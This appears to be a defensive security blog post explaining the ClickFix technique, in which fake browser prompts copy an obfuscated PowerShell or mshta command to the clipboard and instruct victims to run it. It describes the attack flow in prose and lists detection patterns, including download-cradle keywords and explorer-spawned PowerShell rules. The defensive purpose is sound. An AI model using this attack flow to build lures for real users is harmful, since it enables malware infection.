ClickFix: social engineering meets clipboard hijacking

What is ClickFix?

ClickFix is a social engineering technique that has gained traction among threat actors targeting both enterprises and individual users. The attack begins with a compromised or attacker-controlled website that presents a convincing browser notification — typically styled to look like a Chrome, Edge, or Firefox update prompt, a CAPTCHA verification dialog, or a document rendering error. The prompt instructs the user to "fix" the issue by following a short set of steps.

Those steps are the payload delivery mechanism. The page silently copies a malicious command to the user's clipboard — usually a PowerShell one-liner or a mshta invocation — and then instructs the victim to open the Windows Run dialog (Win+R), paste the contents, and press Enter. The user believes they are completing a routine browser fix or verification step. What they are actually doing is executing attacker-supplied code with their own user privileges.

How clipboard hijacking works in this context

The technique exploits the fact that most users do not inspect clipboard contents before pasting. The JavaScript on the attacker's page uses the Clipboard API (navigator.clipboard.writeText()) or a legacy document.execCommand('copy') call to overwrite the clipboard with a carefully crafted command. The command is typically obfuscated — base64-encoded, string-concatenated, or wrapped in nested invocations — to avoid casual inspection.

A representative payload might look like this when decoded: a PowerShell command that downloads a second-stage binary from an attacker-controlled domain, writes it to a temporary directory, and executes it. Some variants use mshta to fetch and run an HTA file, which in turn drops a loader. The common thread is that the initial clipboard payload is short enough to seem innocuous and powerful enough to bootstrap a full compromise.

The attack does not exploit a software vulnerability. It exploits a behavioral pattern: users trust instructions that appear to come from their browser, and they do not read what they paste.

Detection opportunities

Despite its simplicity, ClickFix leaves several artifacts that defenders can monitor. The most reliable detection surface is process telemetry. When a user opens the Run dialog and pastes a command, the resulting process tree is distinctive: explorer.exe spawning powershell.exe or mshta.exe with a command line that contains encoded content, download cradles (Invoke-WebRequest, Invoke-Expression, Net.WebClient), or references to suspicious domains.

Endpoint detection rules can target this pattern specifically. A Sigma rule matching explorer.exe as a parent process spawning powershell.exe with a command-line length exceeding a reasonable threshold (say, 200 characters) and containing base64 patterns or known download primitives will catch the majority of ClickFix variants with a low false-positive rate. Additional signals include clipboard API calls from browser tabs that lack user-initiated copy events, which can be detected via browser telemetry or JavaScript auditing on managed endpoints.

Generating detection rules for ClickFix patterns

The value of understanding ClickFix at a technical level is that it maps cleanly to detection logic. Each stage of the kill chain — the clipboard write, the Run dialog invocation, the process spawn, the download cradle — is an observable event that can be expressed as a rule. Security teams that decompose the technique into these atomic behaviors can build layered detections rather than relying on a single signature that attackers can trivially modify.

Automated rule generation platforms can accelerate this process. Given a structured description of the technique — process relationships, command-line patterns, network indicators — the platform can produce Sigma, KQL, or SPL rules tailored to the organization's SIEM. The key is that the input to the generator must be precise. Vague descriptions produce vague rules. Techniques like ClickFix, with their well-defined execution chain, are ideal candidates for this kind of automated detection engineering.